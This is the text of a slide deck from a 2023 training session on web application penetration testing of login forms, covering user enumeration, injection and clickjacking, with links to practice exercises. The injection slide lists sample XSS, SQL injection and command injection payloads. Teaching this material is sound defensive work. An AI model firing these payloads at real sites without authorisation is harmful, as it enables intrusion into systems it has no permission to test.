Session on
Web Application Pen Test
18 Mar 2023, Bhubaneswar

Who am I 
• Name: Lagnajeet Mishra
• <You may call me Lagna/Bhai/Bhaiya/Bhaina but definitely not “uncle”>
• Has been in IT industry for 10 yrs (*not out)
• Worked in MNCs like UST Global,Infosys,TCS
• Achievement : Surviving in this planet from last 32* years and currently standing Infront of you “alive”
• My parents told me I was born at Puri and I never doubted them 
• Hobbies : Cooking ,Cricket, Chess
Bhubaneswar

चलो अब मुद्दे पे आते हैं
Bhubaneswar

Web Application Penetration Testing
Topic for today : Login Functionality of a web application

Test Cases of the day
User Enumeration
Injection
Click Jacking

User Enumeration
• When an actor can use brute-force techniques to either
guess or confirm valid users in a system.

What should be ideal response

Injection

What can be injected when we consider
input fields in a web application.
• Text
• Alpha Numeric
• Numeric
• SQL
• Script
• HTML
• Command
"`'><script>-javascript:alert(1)</script>
";alert('XSS');//
¼script¾alert(¢XSS¢)¼/script¾
<iframe/src //onload = prompt(1)
' OR 1=1 -- -
-1 UNION SELECT 1 INTO
@,@,@
<h1>Hello,<script>alert(1)</script>!</h1>
;netstat -a;
& ping -i 30 127.0.0.1 &

https://www.hacksplaining.com/exercises/sql-injection
https://www.hacksplaining.com/exercises/xss-reflected
https://www.hacksplaining.com/exercises/command-execution

Click-Jacking
The malicious practice of manipulating a website user's activity by concealing hyperlinks beneath
legitimate clickable content, thereby causing the user to perform actions of which they are
unaware.

Lets try something
• https://www.hacksplaining.com/exercises/click-jacking#

समाप्त
Bhubaneswar